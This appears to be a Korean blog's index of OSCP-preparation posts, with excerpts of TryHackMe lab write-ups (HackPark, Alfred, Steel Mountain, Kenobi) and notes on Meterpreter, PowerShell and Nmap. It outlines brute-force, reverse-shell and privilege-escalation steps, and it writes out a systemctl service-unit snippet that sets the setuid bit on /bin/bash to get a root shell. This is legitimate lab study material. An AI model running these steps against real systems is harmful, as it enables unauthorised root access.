분류 전체보기 205

[Windows] HackPark

HackPark Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine! 1. 익스플로잇-DB 설명 잘 해석하여 StepByStep 따라하기 2. 윈도우에 파워쉘이 설치되어 있으면 wget처럼 다운로드가 쉽다. 3. 권한상승을 위해 winPEAS 또는 파워업 쉘을 활용하자. 4. 페이로드 주입시 미터프리터, 커맨드 쉘 둘다 시도해 보자. 5. 히드라 브루트포스시 필수 파라미터 다 입력해줘야 한다. 더블쿼트 사용시 버그발생함, 싱글쿼트만 사용하자. Flow 정리 1. 정보수집 홈페이지 -> admin 브루트포스(히드라) -> CMS 정..

OSCP/TryHackMe 2020.04.20

파워 쉘 for 침투테스트-1

실행정책 체크 가장 먼저해야 될 일은 파워 쉘 스크립트 파일(.ps1)을 실행 가능한지 체크하는 것이다. cmd> powershell Get-ExecutionPolicy 보안상의 이유로 스크립트 실행에 대한 기본 정책은 Restricted입니다. 다른 스크립트 정책은 다음과 같습니다. Restricted: 파워쉘은 어떤 스크립트든 실행할 수 없다. (파워쉘의 디폴트 실행 정책) Bypass: 어떤 것도 차단되지 않으며 경고나 프롬프트가 없습니다. AllSigned: PowerShell: 디지털 서명으로 서명 된 스크립트 만 실행합니다. 게시자가 서명 한 스크립트를 실행하면 PowerShell은 이전에 보지 못했지만 PowerShell은 스크립트의 게시자를 신뢰할지 묻습니다. RemoteSigned: Po..

OSCP/시험대비 2020.04.16

[Windows] Alfred

Alfred Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens. 잰킨스 Exploit 잰킨스는 project 옵션 -> configure -> build -> windows batch command 를 통해 쉘을 설정하고 build now를 클릭하여 원하는 명령을 실행할 수 있었다. 이를 이용해 잰킨스 관리자 계정을 알고있으면 시스템의 리버스 쉘을 획득할 수있다. 공격 Flow 1. Nishang 파워 쉘 다운 후 바로 nc로 리버스 연결 2. 미터프리터로 쉘 스위치 (권한상승을 더 쉽게 하기 위함) - venom으로 생성 후 다시 잰킨스에서 리버스..

OSCP/TryHackMe 2020.04.16

[Windows] Steel Mountain

Steel Mountain Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access Unquoted Service Path (밑에 자세히 섫명함) [C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe] IObit 폴더에 Advanced.exe 파일을 업로드하는 이유. - 서비스 실행 경로에서 문자열인 Advanced가 스페이스에 의해 짤리게 되고 여..

OSCP/TryHackMe 2020.04.14

[Linux] Kenobi

Kenobi Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation. NMAP -> RPC, NFS, FTP, SMB, SSH 1. smbclient, smbget 2. Nmap nfs 스크립트 검색 (rpcbind) 3. NC로 FTP 배너그래빙 -> searchsploit -> Proftp copy exploit-> 1에서 얻은 로그파일 정보로 위치 파악, ssh개인키를 마운트된 폴더에 복사 -> 내 PC로 mount하여 개인키 다운로드 -> SS..

OSCP/TryHackMe 2020.04.14

Meterpreter

미터프리터 전환 방법 두가지 - 백그라운드 전환 후 (컨트롤+z) 첫번째, sessions -u 1 두번째, use post/multil/manage/shell_to_meterpreter msf post(shell_to_meterpreter) > set session 1 msf post(shell_to_meterpreter) > exploit 참고: https://www.hackingarticles.in/command-shell-to-meterpreter/ we can use “-u” (option) with the session ID for upgrading our shell into meterpreter session. Exploit 후 프로세스 migrate하기 - 해쉬덤프전 수행해야하는 단계 우리..

Systemctl

https://gtfobins.github.io/gtfobins/systemctl/ 1. systemctl 경로를 환경에 맞게 수정 2. bash 권한에 스티키 비트 추가 구문 수정 TF=$(mktemp).service echo '[Service] Type=oneshot ExecStart=/bin/sh -c "chmod +s /bin/bash" [Install] WantedBy=multi-user.target' > $TF ./systemctl link $TF ./systemctl enable --now $TF 위 명령 실행 후.. 스티키비트 생성 확인 $ ls -l /bin/bash 루트 권한 확인 $ /bin/bash -p -p: posix모드..? $ id

Nmap, Gobuster, JohnTheRipper

Nmap -p-: scan all port -Pn: Disable host discovery and just scan for open ports -sV: Service Scan -sC: Scan with the default nmap scripts -A: Enables OS and version detection, executes in-build scripts for further enumeration nmap -sV -vv --script vuln TARGET_IP 포트 명시 안하면 기본적으로 1000개를 검색한다. --script vuln : 스크립트 파일명에 vuln이 포함된 nse파일을 검색한다. GoBuster flag gobuster dir -u http://:3333 -w Descriptio..